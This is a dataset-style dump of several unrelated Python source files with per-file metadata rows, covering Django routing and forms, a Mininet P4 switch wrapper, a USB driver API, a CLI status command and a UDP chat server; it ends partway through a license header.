from . import views
router = routers.DefaultRouter()
router.register("category", views.CategoryViewSet)
router.register("product", views.ProductViewSet)
urlpatterns = [
path("", include(router.urls))
]
| 21.692308 | 50 | 0.769504 | 32 | 282 | 6.75 | 0.5625 | 0.101852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117021 | 282 | 12 | 51 | 23.5 | 0.86747 | 0 | 0 | 0 | 0 | 0 | 0.053381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
247bb0fcb6c8c1435c8ad5d645cceffb1235621f | 9,965 | py | Python | mininet/p4_mininet.py | ghostli123/p4factory | 87ca095036d2023b52e42a8f1e2602f23f7adebe | [
"Apache-2.0"
] | 205 | 2015-04-08T13:35:19.000Z | 2022-03-28T09:22:47.000Z | mininet/p4_mininet.py | ghostli123/p4factory | 87ca095036d2023b52e42a8f1e2602f23f7adebe | [
"Apache-2.0"
] | 97 | 2015-04-16T00:41:05.000Z | 2022-01-26T22:08:34.000Z | mininet/p4_mininet.py | ghostli123/p4factory | 87ca095036d2023b52e42a8f1e2602f23f7adebe | [
"Apache-2.0"
] | 150 | 2015-04-02T18:49:15.000Z | 2022-02-10T23:16:26.000Z | # Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, subprocess, select, time, re, pty
from mininet.util import isShellBuiltin
from mininet.net import Mininet
from mininet.node import Switch, Host
from mininet.log import setLogLevel, info
class P4Host(Host):
def config(self, **params):
r = super(Host, self).config(**params)
self.defaultIntf().rename("eth0")
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload eth0 %s off" % off
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
def describe(self):
print "**********"
print self.name
print "default interface: %s\t%s\t%s" %(
self.defaultIntf().name,
self.defaultIntf().IP(),
self.defaultIntf().MAC()
)
print "**********"
class P4Switch(Switch):
"""P4 virtual switch"""
listenerPort = 11111
thriftPort = 22222
def __init__( self, name, sw_path = "dc_full",
thrift_port = None,
pcap_dump = False,
verbose = False, **kwargs ):
Switch.__init__( self, name, **kwargs )
self.sw_path = sw_path
self.verbose = verbose
logfile = '/tmp/p4ns.%s.log' % self.name
self.output = open(logfile, 'w')
self.thrift_port = thrift_port
self.pcap_dump = pcap_dump
@classmethod
def setup( cls ):
pass
def start( self, controllers ):
"Start up a new P4 switch"
print "Starting P4 switch", self.name
args = [self.sw_path]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--listener', '127.0.0.1:%d' % self.listenerPort] )
self.listenerPort += 1
# FIXME
if self.thrift_port:
thrift_port = self.thrift_port
else:
thrift_port = self.thriftPort
self.thriftPort += 1
args.extend( ['--pd-server', '127.0.0.1:%d' % thrift_port] )
if not self.pcap_dump:
args.append( '--no-cli' )
args.append( self.opts )
logfile = '/tmp/p4ns.%s.log' % self.name
print ' '.join(args)
self.cmd( ' '.join(args) + ' >' + logfile + ' 2>&1 </dev/null &' )
#self.cmd( ' '.join(args) + ' > /dev/null 2>&1 < /dev/null &' )
print "switch has been started"
def stop( self ):
"Terminate P4 switch."
self.output.flush()
self.cmd( 'kill %' + self.sw_path )
self.cmd( 'wait' )
self.deleteIntfs()
def attach( self, intf ):
"Connect a data port"
print "Connecting data port", intf, "to switch", self.name
self.cmd( 'p4ns-ctl', 'add-port', '--datapath', self.name, intf )
def detach( self, intf ):
"Disconnect a data port"
self.cmd( 'p4ns-ctl', 'del-port', '--datapath', self.name, intf )
def dpctl( self, *args ):
"Run dpctl command"
pass
# Based on code from
# http://techandtrains.com/2014/08/21/docker-container-as-mininet-host/
class P4DockerSwitch(Switch):
"""P4 virtual switch running in a docker container"""
def __init__( self, name, target_name = 'p4dockerswitch',
thrift_port = None, target_dir = 'switch',
sai_port = None,
swapi_port = None,
pcap_dump = False,
verbose = False,
start_program = '/p4factory/tools/start.sh',
config_fs = None,
pps = 0,
qdepth = 0,
**kwargs ):
self.verbose = verbose
self.pcap_dump = pcap_dump
self.start_program = start_program
self.config_fs = config_fs
self.target_name = target_name
self.target_dir = target_dir
self.thrift_port = thrift_port
self.sai_port = sai_port
self.swapi_port = swapi_port
self.pps = pps
self.qdepth = qdepth
Switch.__init__( self, name, **kwargs )
self.inNamespace = True
@classmethod
def setup( cls ):
pass
def sendCmd( self, *args, **kwargs ):
assert not self.waiting
printPid = kwargs.get( 'printPid', True )
# Allow sendCmd( [ list ] )
if len( args ) == 1 and type( args[ 0 ] ) is list:
cmd = args[ 0 ]
# Allow sendCmd( cmd, arg1, arg2... )
elif len( args ) > 0:
cmd = args
# Convert to string
if not isinstance( cmd, str ):
cmd = ' '.join( [ str( c ) for c in cmd ] )
if not re.search( r'\w', cmd ):
# Replace empty commands with something harmless
cmd = 'echo -n'
self.lastCmd = cmd
printPid = printPid and not isShellBuiltin( cmd )
if len( cmd ) > 0 and cmd[ -1 ] == '&':
# print ^A{pid}\n{sentinel}
cmd += ' printf "\\001%d\\012" $! '
else:
pass
self.write( cmd + '\n' )
self.lastPid = None
self.waiting = True
def popen( self, *args, **kwargs ):
mncmd = [ 'docker', 'exec', "mininet-"+self.name ]
return Switch.popen( self, *args, mncmd=mncmd, **kwargs )
def stop( self ):
dev_null = open(os.devnull, 'w')
subprocess.call( ['docker stop mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
subprocess.call( ['docker rm mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
dev_null.close()
def terminate( self ):
self.stop()
def start( self, controllers ):
print "Starting P4 docker switch", self.name
path = '/p4factory/targets/switch/behavioral-model'
args = [ 'echo \"' + path ]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
args.extend( ['--pd-server', '127.0.0.1:22000'] )
if not self.pcap_dump:
args.append( '--no-pcap' )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--pps', self.pps] )
args.extend( ['--qdepth', self.qdepth] )
# Enable it for verbose logs from model
#args.append( '-t' )
args.append( '--no-veth' )
args.append( '>& /tmp/model.log &' )
args.append( '\" >> /p4factory/tools/bm_start.sh' )
self.cmd( args )
bm_cmd = ['docker', 'exec', 'mininet-' + self.name,
'/p4factory/tools/bm_start.sh' ]
bmp = subprocess.Popen( bm_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
bmp.wait()
def startShell( self ):
self.stop()
docker_name = self.target_name
args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
args.extend( ['--hostname=' + self.name, '--name=mininet-' + self.name] )
if self.thrift_port is not None:
args.extend( ['-p', '%d:22000' % self.thrift_port] )
if self.sai_port is not None:
args.extend( ['-p', '%d:9092' % self.sai_port] )
if self.swapi_port is not None:
args.extend( ['-p', '%d:9091' % self.swapi_port] )
args.extend( ['-e', 'DISPLAY'] )
args.extend( ['-v', '/tmp/.X11-unix:/tmp/.X11-unix'] )
if self.config_fs is not None:
args.extend( ['-v',
os.getcwd() + '/' + self.config_fs + ':/configs'] )
args.extend( [docker_name, self.start_program] )
master, slave = pty.openpty()
self.shell = subprocess.Popen( args,
stdin=slave, stdout=slave, stderr=slave,
close_fds=True,
preexec_fn=os.setpgrp )
os.close( slave )
ttyobj = os.fdopen( master, 'rw' )
self.stdin = ttyobj
self.stdout = ttyobj
self.pid = self.shell.pid
self.pollOut = select.poll()
self.pollOut.register( self.stdout )
self.outToNode[ self.stdout.fileno() ] = self
self.inToNode[ self.stdin.fileno() ] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
self.waiting = False
#Wait for prompt
time.sleep(1)
pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'',
'mininet-' + self.name ]
pidp = subprocess.Popen( pid_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
pidp.wait()
ps_out = pidp.stdout.readlines()
self.pid = int(ps_out[0])
self.cmd( 'export PS1=\"\\177\"; printf "\\177"' )
self.cmd( 'stty -echo; set +m' )
| 35.845324 | 81 | 0.535575 | 1,175 | 9,965 | 4.462128 | 0.278298 | 0.032043 | 0.016021 | 0.009918 | 0.250048 | 0.219722 | 0.171657 | 0.144383 | 0.109861 | 0.109861 | 0 | 0.018814 | 0.327948 | 9,965 | 277 | 82 | 35.974729 | 0.764073 | 0.096839 | 0 | 0.24186 | 0 | 0 | 0.135551 | 0.028212 | 0 | 0 | 0 | 0.00361 | 0.004651 | 0 | null | null | 0.018605 | 0.023256 | null | null | 0.060465 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
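The `startShell` method in the record above drives a docker container through a pseudo-terminal (`pty.openpty` feeding `subprocess.Popen`). A minimal, self-contained sketch of that pattern on POSIX systems — the command run here is an arbitrary stand-in, not part of the original code:

```python
import os
import pty
import select
import subprocess

def run_in_pty(cmd):
    """Run cmd with a pseudo-terminal as stdin/stdout and return its raw output."""
    master, slave = pty.openpty()
    proc = subprocess.Popen(cmd, stdin=slave, stdout=slave, stderr=slave,
                            close_fds=True)
    os.close(slave)                  # parent keeps only the master end
    chunks = []
    while True:
        ready, _, _ = select.select([master], [], [], 5)
        if not ready:                # timed out waiting for output
            break
        try:
            data = os.read(master, 1024)
        except OSError:              # EIO once the child closes its end (Linux)
            break
        if not data:
            break
        chunks.append(data)
    proc.wait()
    os.close(master)
    return b''.join(chunks)
```

Programs that detect a tty (prompts, `docker run -ti`) behave interactively under this setup, which a plain pipe would not give you; note the pty layer also translates `\n` to `\r\n` in the captured output.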
2484641686c9e401e0c6f1d4e5155e7bdadc8ed6 | 406 | py | Python | stats-backend/collector/migrations/0024_node_benchmarked_at.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | null | null | null | stats-backend/collector/migrations/0024_node_benchmarked_at.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | 4 | 2021-03-28T16:42:41.000Z | 2022-01-01T14:48:46.000Z | stats-backend/collector/migrations/0024_node_benchmarked_at.py | golemfactory/golem-stats-backend | 95467749a13e4496032150cf08a9a3686ef213d3 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.8 on 2021-10-13 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('collector', '0023_node_benchmark_score'),
]
operations = [
migrations.AddField(
model_name='node',
name='benchmarked_at',
field=models.DateTimeField(blank=True, null=True),
),
]
| 21.368421 | 62 | 0.610837 | 44 | 406 | 5.522727 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064626 | 0.275862 | 406 | 18 | 63 | 22.555556 | 0.761905 | 0.110837 | 0 | 0 | 1 | 0 | 0.144847 | 0.069638 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
248630c333547d480ed84c90947e296fc0fc3449 | 8,662 | py | Python | joulescope/usb/api.py | tadodotcom/pyjoulescope | ab9645a2774cf5d5355dee4c1e60a566419b0e00 | [
"Apache-2.0"
] | 29 | 2018-12-19T22:42:09.000Z | 2022-01-31T12:26:52.000Z | joulescope/usb/api.py | tadodotcom/pyjoulescope | ab9645a2774cf5d5355dee4c1e60a566419b0e00 | [
"Apache-2.0"
] | 23 | 2019-07-21T23:44:46.000Z | 2022-03-11T13:29:11.000Z | joulescope/usb/api.py | tadodotcom/pyjoulescope | ab9645a2774cf5d5355dee4c1e60a566419b0e00 | [
"Apache-2.0"
] | 9 | 2019-07-22T00:07:53.000Z | 2021-11-26T11:46:19.000Z | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The USB backend which must be implemented for each platform type.
This module defines the USB backend. Each target platform
(such as Windows, Mac OS/X and Linux), must implement backend that conforms
to this API.
This API is **not** thread-safe. All methods and functions must be invoked
from a single thread.
"""
class DeviceEvent:
ENDPOINT_CALLBACK_STOP = -1 # a callback indicated that streaming should stop
UNDEFINED = 0
    COMMUNICATION_ERROR = 1  # a communication error that prevents this device from functioning, such as device removal
ENDPOINT_CALLBACK_EXCEPTION = 2 # a callback threw an exception
class DeviceDriverApi:
"""The device driver API.
This API is **not** thread-safe. All methods must be invoked from a
single thread.
"""
def __str__(self):
"""Get the user-friendly device string.
:return: f'{product_id_str}:{serial_number_str}'
:raise IOError: On failure.
WARNING: This function must correctly identify the device BEFORE it
is opened. Therefore, it must only use the information available
from USB enumeration.
"""
raise NotImplementedError()
@property
def serial_number(self):
"""Get the assigned serial number.
:return: The serial number string.
This attribute is valid even before the device is opened.
"""
raise NotImplementedError()
def open(self, event_callback_fn):
"""Open the USB device.
:param event_callback_fn: The function(event, message) to call on
asynchronous events, mostly to allow robust handling of device
errors. "event" is one of the :class:`DeviceEvent` values,
and the message is a more detailed description of the event.
:raise IOError: On failure.
The event_callback_fn may be called asynchronous and from other
threads. The event_callback_fn must implement any thread safety.
"""
raise NotImplementedError()
def close(self):
"""Close the USB device."""
raise NotImplementedError()
def control_transfer_out(self, cbk_fn, recipient, type_, request, value=0, index=0, data=None) -> bool:
"""Perform a control transfer with data from host to device.
:param cbk_fn: The function called with the class:`ControlTransferResponse` result.
This method guarantees that cbk_fn will always be called.
cbk_fn may be called BEFORE exiting this method call.
:param recipient: The recipient which is one of ['device', 'interface', 'endpoint', 'other']
:param type_: The type which is one of ['standard', 'class', 'vendor'].
:param request: The bRequest value.
:param value: The wValue value.
:param index: The wIndex value.
:param data: The optional data to transfer from host to device.
None (default) skips the data phase.
:return: True on pending, False on error.
"""
raise NotImplementedError()
def control_transfer_in(self, cbk_fn, recipient, type_, request, value, index, length) -> bool:
"""Perform a control transfer with data from device to host.
:param cbk_fn: The function called with the class:`ControlTransferResponse` result.
This method guarantees that cbk_fn will always be called.
cbk_fn may be called BEFORE exiting this method call.
:param recipient: The recipient which is one of ['device', 'interface', 'endpoint', 'other']
:param type_: The type which is one of ['standard', 'class', 'vendor'].
:param request: The bRequest value.
:param value: The wValue value.
:param index: The wIndex value.
:param length: The maximum number of bytes to transfer from device to host.
:return: True on pending, False on error.
"""
raise NotImplementedError()
def read_stream_start(self, endpoint_id, transfers, block_size, data_fn, process_fn, stop_fn):
"""Read a stream of data using non-blocking (overlapped) IO.
:param endpoint_id: The target endpoint address.
:param transfers: The number of overlapped transfers to use,
each of block_size bytes.
:param block_size: The length of each block in bytes which must be
a multiple of the maximum packet size for the endpoint.
:param data_fn: The function(data) to call on each block
of data. The data is an np.ndarray(dtype=uint8) containing
the raw bytes received for each USB transaction.
The length of data is normally block_size.
Any value less than block_size is the last transfer
in the transaction.
When the device stops, it calls data_fn(None). The
device can stop "automatically" through errors or when data_fn
returns True. Call :meth:`read_stream_stop` to stop from
the caller.
This function will be called from the device's thread. The
data_fn must return quickly to ensure that the USB stream
is not starved.
In all cases, data_fn should return None or False to continue
streaming. data_fn can return True to stop the transmission.
Most implementations use some form of non-blocking IO with
multiple queue (overlapped) transactions that are pended
early. On stop, additional data may be read before the
transaction fully stops.
:param process_fn: The function process_fn() to call after all
USB endpoints have been recently serviced and data_fn was
called at least once. The function should still be quick,
but it can have more latency than data_fn.
:param stop_fn: The function(event, message) called when this endpoint
stops streaming data. See :class:`DeviceEvent` for allowed event
values.
Use :meth:`read_stream_stop` to stop.
"""
raise NotImplementedError()
def read_stream_stop(self, endpoint_id):
"""Stop a read stream.
:param endpoint_id: The target endpoint address.
When stop is complete, the data_fn provided to read_stream_start will
be called with None.
Use :meth:`read_stream_start` to start.
"""
raise NotImplementedError()
def status(self):
"""Get the current device status.
:return: A dict containing the following structure:
endpoints: {
pipe_id: { name: {value: v, units: u}, ...}
...
}
"""
raise NotImplementedError()
def signal(self):
"""Signal that an external event occurred.
This method allows another thread to cause the wait in process
to activate.
"""
raise NotImplementedError()
def process(self, timeout=None):
"""Process any pending events.
:param timeout: The timeout in float seconds.
This method uses the operating-system specific method to wait on
pending events, such select and WaitForMultipleObjects.
"""
raise NotImplementedError()
class DeviceNotify:
def __init__(self, cbk):
"""Start device insertion/removal notification.
:param cbk: The function called on device insertion or removal. The
arguments are (inserted, info). "inserted" is True on insertion
and False on removal. "info" contains platform-specific details
about the device. In general, the application should rescan for
relevant devices.
"""
pass
def close(self):
"""Close and stop the notifications."""
raise NotImplementedError()
def scan(name: str=None):
"""Scan for attached devices.
:param name: The case-insensitive name of the device to scan.
:return: The list of attached backend :class:`Device` instances.
"""
raise NotImplementedError()
| 38.497778 | 118 | 0.659317 | 1,122 | 8,662 | 5.019608 | 0.290553 | 0.055398 | 0.04794 | 0.008523 | 0.244318 | 0.216974 | 0.208452 | 0.171875 | 0.158026 | 0.145597 | 0 | 0.002387 | 0.274648 | 8,662 | 224 | 119 | 38.669643 | 0.894 | 0.726622 | 0 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.388889 | false | 0.027778 | 0 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
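The driver interface in the record above declares its contract with `raise NotImplementedError()` stubs, which only fail when a missing method is actually called. An equivalent sketch using Python's `abc` module fails earlier, at instantiation time — the class and method names below are illustrative, not the real joulescope API:

```python
import abc

class DriverApi(abc.ABC):
    """Sketch of a backend contract in the spirit of the API above."""

    @abc.abstractmethod
    def open(self, event_callback_fn):
        """Open the device and register an asynchronous event callback."""

    @abc.abstractmethod
    def close(self):
        """Close the device."""

class FakeDriver(DriverApi):
    """A trivial in-memory implementation, handy for unit tests."""

    def open(self, event_callback_fn):
        self._cb = event_callback_fn
        return True

    def close(self):
        self._cb = None
```

A subclass that omits any abstract method raises `TypeError` the moment you try to instantiate it, instead of surfacing `NotImplementedError` later at an unpredictable call site.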
248b58cb4625736f2cb0396f27150679a31d86b4 | 3,155 | py | Python | tomomibot/commands/status.py | adzialocha/tomomibot | ed3964223bd63340f28d36daa014865f61aaf571 | [
"MIT"
] | 28 | 2018-07-26T09:47:32.000Z | 2022-01-24T10:38:13.000Z | tomomibot/commands/status.py | adzialocha/tomomibot | ed3964223bd63340f28d36daa014865f61aaf571 | [
"MIT"
] | null | null | null | tomomibot/commands/status.py | adzialocha/tomomibot | ed3964223bd63340f28d36daa014865f61aaf571 | [
"MIT"
] | 5 | 2018-08-11T08:07:23.000Z | 2021-12-23T14:47:40.000Z | import os
import click
from tomomibot.audio import all_inputs, all_outputs
from tomomibot.cli import pass_context
from tomomibot.const import GENERATED_FOLDER, MODELS_FOLDER
from tomomibot.utils import line, check_valid_voice, check_valid_model
def list_audio_channels(ctx, channels):
ctx.log(line())
ctx.log('{0:2} {1:8} {2:30}'.format(' #', 'Channels', 'Name'))
ctx.log(line())
for i, chn in enumerate(channels):
ctx.log('{0:2} {1:8} {2:30}'.format(
i,
chn.channels,
chn.name[:30]))
def list_voices(ctx):
ctx.log(line())
ctx.log('{0:2} {1:20} {2:10} {3:10}'.format(
' #', 'Name', 'Status', 'Version'))
ctx.log(line())
voice_dir = os.path.join(os.getcwd(), GENERATED_FOLDER)
for i, entry in enumerate(os.scandir(voice_dir)):
if entry.is_dir():
try:
version = check_valid_voice(entry.name)
except FileNotFoundError:
status = click.style('✘', fg='red')
else:
status = click.style('✓', fg='green')
ctx.log('{0:2} {1:20} {2:10} {3:10}'.format(
i,
entry.name[:30],
status,
version or '?'))
def list_models(ctx):
ctx.log(line())
ctx.log('{0:2} {1:30} {2:10}'.format(' #', 'Name', 'Status'))
ctx.log(line())
model_dir = os.path.join(os.getcwd(), MODELS_FOLDER)
for i, entry in enumerate(os.scandir(model_dir)):
if entry.is_file():
try:
check_valid_model(entry.name.split('.')[0])
except FileNotFoundError:
status = click.style('✘', fg='red')
else:
status = click.style('✓', fg='green')
ctx.log('{0:2} {1:30} {2:10}'.format(
i,
entry.name[:30],
status))
@click.command('status', short_help='Display system info and audio devices')
@click.argument('model', required=False)
@pass_context
def cli(ctx, model):
"""Display system info and audio devices or inspect models."""
if model:
ctx.log(click.style('Inspect model "{}"'.format(model), bold=True))
try:
check_valid_model(model)
except FileNotFoundError:
ctx.elog('Could not find model.')
else:
# Load model and print a summary
from keras.models import load_model
model_name = '{}.h5'.format(model)
model_path = os.path.join(os.getcwd(), MODELS_FOLDER, model_name)
model_test = load_model(model_path)
model_test.summary()
else:
inputs = all_inputs()
outputs = all_outputs()
ctx.log(click.style('Audio input devices', bold=True))
list_audio_channels(ctx, inputs)
ctx.log('')
ctx.log(click.style('Audio output devices', bold=True))
list_audio_channels(ctx, outputs)
ctx.log('')
ctx.log(click.style('Generated voices', bold=True))
list_voices(ctx)
ctx.log('')
ctx.log(click.style('Trained models', bold=True))
list_models(ctx)
| 31.237624 | 77 | 0.559429 | 404 | 3,155 | 4.264851 | 0.232673 | 0.069646 | 0.034823 | 0.027858 | 0.428903 | 0.400464 | 0.311085 | 0.218224 | 0.171793 | 0.116657 | 0 | 0.026774 | 0.289699 | 3,155 | 100 | 78 | 31.55 | 0.740295 | 0.027892 | 0 | 0.37037 | 1 | 0 | 0.115648 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0.024691 | 0.08642 | 0 | 0.135802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2494ce7acc85768e320105780c75c15f78dc92ae | 1,702 | py | Python | pbs/implementation/forms.py | jawaidm/pbs | 87f5c535c976d6a5eccbfbbf2073589b6e366d04 | [
"Apache-2.0"
] | null | null | null | pbs/implementation/forms.py | jawaidm/pbs | 87f5c535c976d6a5eccbfbbf2073589b6e366d04 | [
"Apache-2.0"
] | 12 | 2019-10-22T23:16:38.000Z | 2022-03-11T23:17:45.000Z | pbs/implementation/forms.py | jawaidm/pbs | 87f5c535c976d6a5eccbfbbf2073589b6e366d04 | [
"Apache-2.0"
] | 5 | 2019-12-19T06:18:42.000Z | 2022-01-07T01:16:18.000Z | from django import forms
from pbs.implementation.models import BurningPrescription, EdgingPlan, LightingSequence
from pbs.forms import HelperModelForm, WideTextarea
class BurningPrescriptionForm(forms.ModelForm):
class Meta:
model = BurningPrescription
fields = ('prescription', 'fuel_type', 'scorch', 'grassland_curing_min', 'grassland_curing_max')
class EdgingPlanForm(HelperModelForm):
def __init__(self, *args, **kwargs):
super(EdgingPlanForm, self).__init__(*args, **kwargs)
self.fields['location'].widget = WideTextarea()
self.fields['strategies'].widget = WideTextarea()
class Meta:
model = EdgingPlan
class LightingSequenceForm(HelperModelForm):
def __init__(self, *args, **kwargs):
super(LightingSequenceForm, self).__init__(*args, **kwargs)
self.fields['cellname'].widget.attrs.update({'class': 'span5'})
self.fields['strategies'].widget = WideTextarea()
self.fields['fuel_description'].widget = WideTextarea()
self.fields['resources'].widget = WideTextarea()
self.fields['wind_dir'].widget = WideTextarea()
self.fields['ffdi_min'].required = False
self.fields['ffdi_max'].required = False
self.fields['grassland_curing_min'].required = False
self.fields['grassland_curing_max'].required = False
self.fields['gfdi_min'].required = False
self.fields['gfdi_max'].required = False
self.fields['ros_min'].required = False
self.fields['ros_max'].required = False
self.fields['wind_min'].required = False
self.fields['wind_max'].required = False
class Meta:
model = LightingSequence
| 37 | 104 | 0.683901 | 175 | 1,702 | 6.451429 | 0.285714 | 0.150576 | 0.135518 | 0.183348 | 0.44287 | 0.189548 | 0.072631 | 0 | 0 | 0 | 0 | 0.000725 | 0.189189 | 1,702 | 45 | 105 | 37.822222 | 0.817391 | 0 | 0 | 0.205882 | 0 | 0 | 0.145711 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.088235 | 0 | 0.323529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24956ea92fc62e0f8fb21dbe9885cc8032b1251e | 571 | py | Python | many_to_many/server.py | Abhinav1004/Network_Programming | d647021fd7b6c2b445a30d941dcc4c3472792a11 | [
"MIT"
] | null | null | null | many_to_many/server.py | Abhinav1004/Network_Programming | d647021fd7b6c2b445a30d941dcc4c3472792a11 | [
"MIT"
] | null | null | null | many_to_many/server.py | Abhinav1004/Network_Programming | d647021fd7b6c2b445a30d941dcc4c3472792a11 | [
"MIT"
] | null | null | null | import socket
import time

host = '127.0.0.1'
port = 5000
clients = []

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((host, port))
s.setblocking(0)
quitting = False

print "Server Started."
while not quitting:
    try:
        data, addr = s.recvfrom(1024)
        if "Quit" in str(data):
            quitting = True
        if addr not in clients:
            clients.append(addr)
        print time.ctime(time.time()) + str(addr) + ": :" + str(data)
        for client in clients:
            s.sendto(data, client)
    except:
        pass
s.close()
| 18.419355 | 69 | 0.58669 | 78 | 571 | 4.269231 | 0.538462 | 0.048048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036765 | 0.285464 | 571 | 30 | 70 | 19.033333 | 0.779412 | 0 | 0 | 0 | 0 | 0 | 0.054482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.043478 | 0.086957 | null | null | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2495d28bed0397782cf935e677a1c24cddbc7aa5 | 2,245 | py | Python | dex/tools/list_debuggers/Tool.py | jmorse/dexter | 79cefa890d041dfc927aea2a84737aa704ddd35c | [
"MIT"
] | null | null | null | dex/tools/list_debuggers/Tool.py | jmorse/dexter | 79cefa890d041dfc927aea2a84737aa704ddd35c | [
"MIT"
] | null | null | null | dex/tools/list_debuggers/Tool.py | jmorse/dexter | 79cefa890d041dfc927aea2a84737aa704ddd35c | [
"MIT"
] | null | null | null | # DExTer : Debugging Experience Tester
# ~~~~~~ ~ ~~ ~ ~~
#
# Copyright (c) 2018 by SN Systems Ltd., Sony Interactive Entertainment Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
